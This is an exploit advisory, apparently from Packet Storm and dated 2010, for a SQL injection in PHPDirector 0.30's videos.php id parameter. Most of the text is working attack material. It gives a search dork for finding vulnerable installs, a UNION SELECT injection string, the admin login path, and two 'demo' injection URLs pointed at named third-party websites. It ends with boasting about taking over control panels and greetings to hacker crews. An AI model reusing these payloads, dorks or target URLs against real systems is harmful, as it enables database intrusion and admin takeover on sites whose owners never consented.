PHPDirector version 0.30 suffers from a remote SQL injection vulnerability.
8b1d216285e79ce2e799126fa65e6e0c8383df3b26e5a28fb704ba85bb5eb402
======================================================================
PHPDirector 0.30 (videos.php) SQL Injection Vulnerability #
======================================================================
# Date : 29/06/2010 #
# Author : Mr-AbdoX #
# Emails : Y6u@HoTmaiL.Com & Oz1@HoTmaiL.Com #
# My web Sites : http://Sec-Eviles.com/vb & http://Arspam.com/ #
# Script home : www.phpdirector.co.uk/ #
# Tested on : Linux & Windows #
=================Exploit==============================================
Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ]
[~] ExploiT [~]
http://www.site.com/videos.php?id=[SQL]
union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
[~] ConTroL Panel (admin login) [~]
http://www.site.com/login.php
[~] demo [~]
http://www.onevent.biz/paramore/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
http://www.videoindirizle.com/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
enjoy in control panel Like U WanT :p
Don't Forget greetz Me...
Peace
[~] GreetZ To [~]
The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed